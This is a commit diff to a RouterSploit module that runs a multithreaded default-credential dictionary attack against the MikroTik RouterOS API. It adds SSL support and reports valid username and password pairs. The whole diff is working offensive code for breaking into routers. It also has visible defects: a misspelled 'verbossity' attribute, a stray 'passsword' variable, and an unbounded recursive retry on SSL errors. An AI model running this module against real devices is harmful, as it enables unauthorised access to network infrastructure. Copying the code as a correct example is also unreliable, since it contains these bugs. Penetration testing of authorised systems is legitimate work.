Fix Mikrotik RouterOS API creds module (#816)

routersploit/modules/creds/routers/mikrotik/api_ros_default_creds.py

+import socket
+import ssl
+
 from routersploit.core.exploit import *
 from routersploit.core.tcp.tcp_client import TCPClient
-from routersploit.libs.apiros.apiros_client import ApiRosClient
+from routersploit.libs.apiros.apiros_client import ApiRosClient, LoginError
 
 
 class Exploit(TCPClient):
     __info__ = {
         "name": "Mikrotik Default Creds - API ROS",
-        "description": "",
+        "description": "Module performs dictionary attack against Mikrotik API and API-SSL. "
+                       "If valid credentials are found they are displayed to the user.",
         "authors": (
             "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
         ),
@@ -18,6 +22,8 @@ class Exploit(TCPClient):
     target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
     port = OptPort(8728, "Target API port")
 
+    ssl = OptBool(False, "Use SSL for API")
+
     threads = OptInteger(1, "Number of threads")
     defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
     stop_on_success = OptBool(True, "Stop on first valid authentication attempt")
@@ -44,30 +50,53 @@ class Exploit(TCPClient):
         else:
             print_error("Credentials not found")
 
-    def target_function(self, running, creds):
-        while running.is_set():
+    def login(self, username, password):
         try:
-                username, password = creds.next().split(":", 1)
-
-                tcp_client = self.tcp_create()
-                tcp_sock = tcp_client.connect()
-                apiros = ApiRosClient(tcp_client)
+            apiros = ApiRosClient(
+                address=self.target,
+                port=self.port,
+                user=username,
+                password=password,
+                use_ssl=self.ssl
+            )
+            apiros.open_socket()
 
-                output = apiros.login(username, password)
+            output = apiros.login()
 
             if output[0][0] == "!done":
-                    if self.stop_on_success:
-                        running.clear()
-
                 print_success("Authentication Succeed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
                 self.credentials.append((self.target, self.port, self.target_protocol, username, password))
+                apiros.close()
+                return True
             else:
+                print_error("Unexpected Response - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbossity)
+
+        except LoginError:
+            apiros.close()
             print_error("Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
+        except ssl.SSLError:
+            apiros.close()
+            print_error("SSL Error, retrying...")
+            return self.login(username, password)
 
-                tcp_client.close()
+        apiros.close()
+        return False
 
+    def target_function(self, running, creds):
+        while running.is_set():
+            username = ""
+            passsword = ""
+            try:
+                username, password = creds.next().split(":", 1)
+                if self.login(username, password) and self.stop_on_success:
+                    running.clear()
             except RuntimeError:
                 print_error("Connection closed by remote end")
+                break
+
+            except socket.timeout:
+                print_error("Timeout waiting for the response")
+                break
 
             except StopIteration:
                 break